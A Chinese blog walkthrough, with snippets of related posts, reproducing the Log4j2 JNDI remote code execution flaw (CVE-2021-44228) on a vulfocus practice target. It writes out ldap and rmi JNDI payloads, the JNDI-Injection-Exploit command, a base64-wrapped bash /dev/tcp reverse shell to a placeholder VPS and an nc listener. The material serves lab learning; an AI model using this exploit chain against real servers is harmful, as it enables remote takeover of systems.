代码编织梦想

vps:centos8 腾讯云
本地:windows11
靶场环境:http://123.58.236.76:64936/

访问靶场环境http://123.58.236.76:64936/
在这里插入图片描述
点击???
在这里插入图片描述
burp抓包,DNSlog验证漏洞是否存在
在这里插入图片描述
构造payload=${jndi:ldap://7272sq.ceye.io},并在burp中请求数据,返回400

payload=${jndi:ldap://7272sq.ceye.io}

在这里插入图片描述
对payload进行url编码(burp自带),再次进行请求,出现200,DNSlog中出现记录,证明漏洞存在
在这里插入图片描述
在这里插入图片描述
使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行漏洞利用,下载地址:

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

使用方式

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [vps的ip]

反弹shell指令(xxxxx为vps的ip,5555为任意未占用的端口)

bash -i >& /dev/tcp/xxxxx/5555 0>&1

将上述命令base64编码
然后在vps开启开启两个窗口
窗口1输入(aaaaa为刚刚base64编码后的反弹shell指令,xxxxx为vps的ip)

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,aaaaa}|{base64,-d}|{bash,-i}" -A xxxxx

在这里插入图片描述
窗口2输入

nc -lvvp 5555

在这里插入图片描述
burp中构造payload=${jndi:rmi://xxxxx/zpm6mz}

payload=${jndi:rmi://xxxxx/zpm6mz}

在这里插入图片描述
再次对payload进行url编码,再次请求,反弹shell
在这里插入图片描述
在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45632448/article/details/124149561

Apache Log4j2代码执行漏洞复现(cve-2021-44228)-爱代码爱编程

目录 一、漏洞描述二、影响范围三、漏洞复现1、创建一个maven项目,并导入log4j的依赖包2、编写POC3、编写恶意类4、起http服务5、编译并开启LDAP服务6、运行POC四、反弹shell1、靶场搭建2、访问漏洞环境,环境部署成功3、起RMI和Ldap服务4、开启nc监听5、火狐浏览器进行验证6、反弹shell成功 一、漏洞描述 l

[漏洞复现]log4j漏洞RCE(CVE-2021-44228)-爱代码爱编程

文章源自于个人博客:http://vfree.ltd/ 前言 2021/12/09,阿里云安全团队向apache报告了由log4j日志引起的远程代码执行,12月10日,当天白帽跟提前过大年似的,疯狂刷src(利用超级简单),让部分src平台暂时停止收类似该漏洞,凌晨,很多程序员和安全员被迫起来应急响应,几乎市面上的大厂都受到了该漏洞的影

Log4j2漏洞复现(CVE-2021-44228)-爱代码爱编程

引言         Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标

Apache Log4j2远程代码执行漏洞复现 CVE-2021-44228,python编写POC-爱代码爱编程

环境搭建: 使用docker拉取: [root@www /]# docker pull vulfocus/log4j2-rce-2021-12-09 运行: [root@www /]# docker run -P vulfocus/log4j2-rce-2021-12-09 查看端口: [root@www ]# docker

vulfocus Apache log4j2-RCE 漏洞复现(CVE-2021-44228)-爱代码爱编程

根据提示,漏洞存在于http://xxxxx/hello的payload参数中,并以post的方式传参,因此我们可以利用hackerbar进行漏洞验证 创建靶场后是这样一个页面。 使用payload验证,发现可以触发dnslog,可以确认可以利用 证明存在JNDI注入漏洞。 在这里我们需要用到JNDI-Injection-Exploit-1.0-SN

Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell)-爱代码爱编程

文章目录 1、构造EXP2、使用javac进行编译3、将.class文件放到web根目录下4、使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个ldap的服务5、nc开启监听6、准备工作完毕,上payload7、靶场测试8、成功反弹shell 最近log4j2可谓是无人不知无人不晓,出去吹牛不知道这个还好意思说自己是

Apache Log4j2 (CVE-2021-44228)漏洞详细复现过程(docker)-爱代码爱编程

复现环境 centos7(docker依赖环境),kali2019 环境搭建 1.使用 docker 拉取漏洞镜像 docker pull vulfocus/log4j2-rce-2021-12-09:latest 2.查看漏洞镜像并开启环境 docker images docker run -d -P vulfocus/log4j

Log4j2 漏洞复现GetShell-爱代码爱编程

目录: 一、搭建环境1. 首先拉一个docker镜像2. 然后启动环境二、获取shell首先,试验一下DNSLog1. 准备JNDI注入工具下载进入目录打包成jar包2. 利用生成payload反弹shell 一、搭建环境 1. 首先拉一个docker镜像 docker pull vulfocus/log4j2-rce-2021-12-09

vulfocus/log4j2-rce-2021-12-09:latest通关-爱代码爱编程

别的大佬在漏洞出来后立马复现利用都学明白了,我这个菜鸟开始了 搜到了在vulfocus.fofa.io靶场有更新了,就在这里开始了学习 启动靶场 按照官方说的漏洞位置在/hello,漏洞变量是payload 按照官方说的在hello里面访问hello 查看漏洞是否存在,当然啦,这是靶场怎么会不存在呢,哈哈哈 证明漏洞存在的方式: dnslog地址 构造

log4j2漏洞复现(CVE-2021-44228)-爱代码爱编程

目录 漏洞简介:影响版本:复现环境1:复现环境2:复现环境3:复现环境4:安全建议: 漏洞简介: log4j是Apache公司的一款JAVA日志框架,基本上只要是java的框架都会用到这个log4j框架,所以上周不管是不是IT圈的都几乎被刷屏了,可见这个洞的危害之大,波及范围之广。所以复现一下。 影响版本: Apache Log4j 2.

Log4j2远程命令执行(cve-2021-44228)复现-爱代码爱编程

目录 用vulfocus docker漏洞环境 漏洞复现-获取shell 用vulfocus docker漏洞环境 docker pull vulfocus/log4j2-rce-2021-12-09:latest ​ docker run -p  8080:8080 -d --name log4j2-rce vulfocus/log4j2-rc

log4j2-rce漏洞复现(CVE-2021-44228)-爱代码爱编程

漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3.1) 漏洞编号:CVE-2021-44228 漏洞复现 利用vulfocus搭

用vulfocus靶场环境复现log4j2远程命令执行漏洞_vulfocus拉去log4j漏洞-爱代码爱编程

声明:文章所提供的内容和工具仅供于个人学习和研究,严禁传播者利用本文章的相关内容进行非法测试。由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。